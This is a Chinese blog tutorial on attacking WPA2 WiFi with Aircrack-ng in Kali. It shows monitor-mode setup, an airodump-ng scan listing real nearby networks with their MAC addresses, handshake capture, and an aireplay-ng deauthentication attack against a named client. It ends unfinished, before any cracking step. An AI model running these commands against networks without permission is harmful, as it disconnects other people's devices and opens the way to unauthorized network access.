skip to content
Logo 三七の小站

在 kali 虚拟机中 使用 Aircrack-ng 破解 wifi

/ 3 min read

详细演示了在Kali虚拟机中进行WiFi安全测试的步骤,包括关闭干扰服务、启动监听模式、扫描WiFi网络、捕获并保存握手包,以及使用deauth攻击获取数据包。文章以实用指南形式,为网络安全专业人士提供了WiFi渗透测试的基础操作

1. 关闭可能影响的服务

airmon-ng check kill

2. 查看可用的无线网卡

airmon-ng

3. 开启网卡监听模式

airmon-ng start wlan0

4. 扫描周围 wifi

airodump-ng wlan0
# airodump-ng wlan0
CH 5 ][ Elapsed: 1 min ][ 2024-07-09 12:19
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
64:64:4A:28:B8:6E -6 93 3 0 1 360 WPA2 CCMP PSK Redmi_77EE
68:F0:B5:01:DE:10 -46 15 6 0 11 360 WPA2 CCMP PSK zzh
CC:08:FB:2B:5E:3C -48 33 0 0 6 405 WPA2 CCMP PSK TP-LINK-1503
C8:F7:42:4B:27:D6 -50 18 0 0 6 65 WPA2 CCMP PSK 424b27d6
54:0D:F9:00:55:C4 -50 19 0 0 1 360 WPA2 CCMP PSK HUAWEI-LK
54:0D:F9:00:55:C9 -52 20 0 0 1 360 WPA2 CCMP PSK <length: 0>
56:A7:03:26:BF:F7 -54 4 1 0 1 540 WPA2 CCMP PSK WP2SfIN7priMzFrl
A4:56:02:61:21:3D -54 10 3 0 1 270 WPA2 CCMP PSK 360WiFi-61213D
EC:26:CA:AC:70:58 -55 10 0 0 6 405 WPA2 CCMP PSK TP-LINK_7058
54:A7:03:66:BF:F7 -55 6 1 0 1 540 WPA2 CCMP PSK TP-LINK_BFF7
28:D1:27:13:D1:E2 -56 10 0 0 6 130 WPA2 CCMP PSK Xiaomi_D1E1
38:15:4E:66:08:30 -56 6 0 0 11 130 WPA2 CCMP PSK CMCC-ZumH
EE:9B:2D:B9:D7:F2 -47 7 0 0 9 360 WPA2 CCMP PSK <length: 0>
14:09:DC:C6:0D:68 -56 2 0 0 6 130 WPA2 CCMP PSK CMCC-MA2T
68:DB:54:54:A1:2D -55 2 0 0 4 130 WPA2 CCMP PSK @PHICOMM_1903
BSSID STATION PWR Rate Lost Frames Notes Probes
(not associated) 4E:31:31:E1:17:0E -15 0 - 1 0 2

5. 开始抓取握手包并保存成文件

airodump-ng -c 6 --s --bssid BC:E0:01:9D:88:C1 wlan0 -w test2
# -c 指定信道,一定要是上一步查到的要破解的wifi所用信道
# -bssid 指定bssid值,一定要是上一步查到的要破解的wifi的bssid
# -w 指定捕获的握手到保存到的文件名
# --s 选项会在输出中显示接收的确认帧数量, 用于确认接收到的数据包

6. 主动出击获取握手包

aireplay-ng -0 2 -a BC:E0:01:9D:88:C1 -c 12:E0:1D:07:BF:F4 wlan0
# -0表示通知设备断开连接
# 2表示deauth攻击次数,小点大点都行吧
# -a指定仿造的wifi的mac地址(即bssid)
# -c表示要让认证失效的设备的mac地址,在上一步中可以看到

此时会在指定的目录产生以下四个文件 .cap是抓取到握手包的数据包文件 出现 [ WPA handshake: … ] 表示抓包成功

未完待续…